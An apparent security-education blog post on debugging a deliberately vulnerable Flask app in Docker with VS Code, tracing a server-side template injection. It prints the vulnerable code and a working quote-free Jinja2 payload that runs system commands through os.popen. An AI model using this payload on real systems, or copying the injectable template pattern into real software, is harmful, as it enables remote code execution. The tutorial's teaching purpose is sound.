White-box penetration testing: Debugging for Python vulnerabilities

September 12, 2024

This article explains how to perform white-box penetration testing on a Python web application running in a Docker container. In this white-box pentest, we will go through how to debug Python in VS Code in order to track our payloads throughout the process, and understand how security filters can hide vulnerabilities in plain sight.

Outline

Necessary resources
Install necessary resources
File structure
Hunt for Python vulnerabilities
Common Python vulnerabilities
Improve future black-box testing with code analysis
Conclusion
References

Necessary resources

Visual Studio Code aka VS Code (or your preferred IDE)
Python Debugger
Docker

Install necessary resources

Once you have installed Visual Studio Code, you can install the Python debugger extension from the extension tab on the left-hand side. Simply search for "Python debugger" and install it:

File structure

Our project will use the following file structure:

.
├── config
│ └── supervisord.conf
├── docker-compose.yml
├── Dockerfile
└── vsnippet
  ├── 6-ssti-classic.py
  ├── ignore
  │ └── design
  │ └── design.py
  └── templates
    └── index.html

Certain files are extra-important and must be added or modified. The files below contain the final file content:

6-ssti-classic.py

This is the vulnerable Python web application that we will run in a dockerised environment.

from flask import Flask, render_template_string, render_template, request
import html
from ignore.design import design
app = design.Design(Flask(__name__), __file__, 'Vsnippet 6 - Server Side Template Injection (SSTI)')

##
# YesWeHack - Vulnerable code snippets
##

def MySQL_Get(table, data):#<-Dummy function
  return False, ""

def searchResult():#<-Dummy function
  return ""

def NoItemFound(s):
  tpl = ('''
  <script src="{{ domain }}/main.js"></script>
  <h3 id="search">No result for: %s</h3>
  ''' % s)
  return render_template_string(tpl, domain=request.url_root)

@app.route('/')
def index():
  try:
    #Get the user search value:
    search = html.escape(request.args.get('search'))
  except:
    return render_template('index.html', result="No search provided")

  db_status, db_data = MySQL_Get("products", search)
  if db_status:
    data = searchResult(db_data)
  else:
    data = NoItemFound(search)
  
  #Return content to client:
  return render_template('index.html', result=data)

if __name__ == '__main__':
  app.run(host='0.0.0.0', port=1337)

supervisord.conf

In our supervisord.conf file the only thing we need to modify is the command argument in the program flask. We will set the command to: python -m debugpy --listen 0.0.0.0:5678 --wait-for-client /app/6-ssti-classic.py to make sure our debugger listener starts once our Docker container boots up.

[supervisord]
user=root
nodaemon=true
logfile=/dev/null
logfile_maxbytes=0
pidfile=/run/supervisord.pid

[program:flask]
command=python -m debugpy --listen 0.0.0.0:5678 --wait-for-client /app/6-ssti-classic.py
stdout_logfile=/dev/stdout
stdout_logfile_maxbytes=0
stderr_logfile=/dev/stderr
stderr_logfile_maxbytes=0

launch.json

This will be the configuration used to tell Visual Studio Code how to connect to the Python Debugger running in a Docker container.

{
  "version": "0.2.0",
  "configurations": [
    {
      "name": "Python Debugger: Remote Attach",
      "type": "debugpy",
      "request": "attach",
      "connect": {
          "host": "172.20.0.111",
          "port": 5678
      },
      "pathMappings": [
        {
          "localRoot": "${workspaceFolder}/vsnippet",
          "remoteRoot": "."
        }
      ]
    }
  ]
}

Dockerfile

As well as building the Docker image, the Dockerfile installs and activates our Python debugger inside the Docker container.

FROM python:3

#Install and update system dependencies
RUN apt update -y; apt install -y supervisor
RUN pip install flask debugpy

#Prepare and setup the working directory
RUN mkdir -p /app
WORKDIR /app
COPY vsnippet .
COPY config/supervisord.conf /etc/supervisord.conf

#Disable pycache
ENV PYTHONDONTWRITEBYTECODE=1

CMD [ "/usr/bin/supervisord", "-c", "/etc/supervisord.conf" ]

docker-compose.yml

To this file we will add a network called debug-net. We will then add a static IPv4 address to our Python web application: 172.20.0.111. Finally, we will open Python's debugger port: 5678.

This setup allows us to more effectively connect and communicate with the Python debugger running in the Docker container.

version: '3.8'

services:
  python-flask:
  container_name: ssti-classic-6
  build:
    context: .
    dockerfile: Dockerfile
  ports:
    - "127.0.0.1:1337:1337"
    - "127.0.0.1:5678:5678"
  networks:
    debug-net:
      ipv4_address: 172.20.0.111

networks:
  debug-net:
    driver: bridge
    ipam:
    config:
      - subnet: 172.20.0.0/24

Verify our setup

To validate that our setup is working properly, we need to start our Docker container, connect to Python Debugger, set up breakpoints in Visual Studio Code and, finally, perform a request to the web application to see if the debugger stops at these breakpoints.

Go to the root folder of the project file (see header: File structure) and run the following command:

docker compose up --build

Usually, you want to start this command in the background (using the argument -d), but if you’re unfamiliar with Docker, I recommend running the command as it appears above so that you can see the logs. Once the Docker container has finished the build process and starts, we notice this message from our Python debugger:

This message shows that our Docker started successfully and that Python’s debugger is now listening for a connection and primed to start debugging Python.

Now let's set up some breakpoints inside the Python web application code located in Visual Studio Code!

We can set up breakpoints by clicking on the red dot that appears when you hover over the line number.

Inside VS Code, go to the debugger section on the left-side panel (shortcut: CTRL+SHIFT+D). Once inside the debug section, press the green arrow icon located at the top (see image below):

With the debugger in Visual Studio Code up and running and connected to Python's debugger, you should now see in the terminal that the Python web application is running.

The logs should look like this:

Now our debugger is connected, it's time to perform a HTTP request to trigger the Visual Studio Code breakpoints. We can use the command line interface (CLI) tool cURL to send a GET request to our web application:

curl http://localhost:1337/

If everything goes as expected, you should not get a response back directly. Instead you should have some code highlighted inside VS Code that proves the debugger is working and that it stopped at the first breakpoint:

Hunt for Python vulnerabilities

Now we know our setup and debugger are working as expected, it's time for the bug hunt.

As you may have already noticed, our web application is vulnerable to a server-side template injection (SSTI) vulnerability. Let’s try an SSTI payload: {{7*'7'}}, which in Python Jinja2 results in 7777777.

Next we analyse the request we sent containing our payload in the search GET parameter. In Visual Studio Code, we can see a breakpoint hit:

We then click the blue, triangular arrow at the top (the first arrow from left to right):

Take a close look at the debug side panel to the left: our payload, which was included in the GET parameter search, is now a part of the search Python variable. But you might also notice that the payload has been HTML-escaped – so in theory, if the web application is vulnerable to a SSTI, we should get an error.

Let's move to our next breakpoint to see what final input is given to the template engine:

You can see that the template for the domain Python variable looks correct: {{ domain }}. However, our payload, {{7*'7'}}, is HTML-escaped by the Python function html.escape. This makes our payload non-functional.

And as predicted, we got a 500 server error in our HTTP response!

To confirm that the vulnerability now exists, we can use the payload {{7*7}} and see how Python reacts this time using VS Code's debugger:

Looking at our debugger result, we can see that everything looks good!

And we get a positive result: 49 appearing in the HTTP response from our vulnerable web application!

Now that we understand how our payload is being escaped and inserted, we can adapt the payload to exploit the web application and achieve a remote code execution (RCE)!

Because our payload is HTML-escaped before it is inserted into the template string, we cannot take advantage of quotes. And without being able to write the command as a pure string, it will be more challenging to provide a system command. Luckily, we have a solution: Read ‘Limitations are just an illusion: Advanced server-side template exploitation with RCE everywhere’ to learn how to achieve RCE without using quotation marks in your payload.

We could access the Python function chr, which converts a hex decimal value to its string character and use this to generate a string. As an example, we can generate the id string with the following command:

{{ self.__init__.__globals__.__builtins__.chr(105)+self.__init__.__globals__.__builtins__.chr(100) }}

Values 105 and 100 represent the ASCII characters i and d, resulting in id.

Then we can use this string as our argument in Python's os.popen function, which will execute our system command and give us RCE:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__builtins__.chr(105)+self.__init__.__globals__.__builtins__.chr(100)).read() }}

This results in a successful remote code execution on our web application!

Common Python vulnerabilities

Below are three common Python weaknesses associated with the Python programming language.

CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Although prototype pollution vulnerabilities mainly affect the JavaScript programming language, Python can contain flaws that fall into this category, namely “class pollution” vulnerabilities.

CWE-1336: Improper Neutralisation of Special Elements Used in a Template Engine

While this vulnerability is not specifically related to Python, it is important to note that most Python template engines are very powerful. Since they typically provide the ability to run pure Python code within the template engine, there’s a particularly significant risk of high-impact vulnerabilities.

CWE-36: Absolute Path Traversal

Any programming language can be vulnerable to this CWE. With Python, absolute path traversal can arise when developers use os.path.join insecurely. This function is often used when joining paths and filenames, but many developers don’t realise that if os.path.join contains a filename with a front-slash prefix such as /myfile.txt, it may have unexpected and unwanted results.

Code example:

import os
filename = "/myfile.txt"
result = os.path.join("/my/path/", filename)
print(result) # Result in: /myfile.txt

Improve future black-box testing with code analysis

As we hoped, our SSTI payload generated a HTTP response containing a 500 server error. By using the debugger, we discovered that the payload failed not because of an error in the payload itself, but because the server HTML-escaped the payload, rendering it invalid.

As a takeaway for future black-box testing, it’s worth testing out multiple payloads with various tweaks when trying to detect the same vulnerability. Deploying a wide variety of payloads is a great way of detecting possible changes from the back-end server and to avoid false negatives.

Conclusion

Debugging your target’s source code helps you to track executed code triggered by the client (attacker). The process we’ve detailed can optimise your testing flow and surface behaviours that help you identify how user input is being handled.

If the server HTML encodes your SSTI payload and makes it invalid in the execution process, it is important to understand how this will affect your future exploitation of the vulnerability. To this end, practising debugging and code analysis on vulnerable targets will teach you how different filters are used and how various programming languages implement protection mechanisms.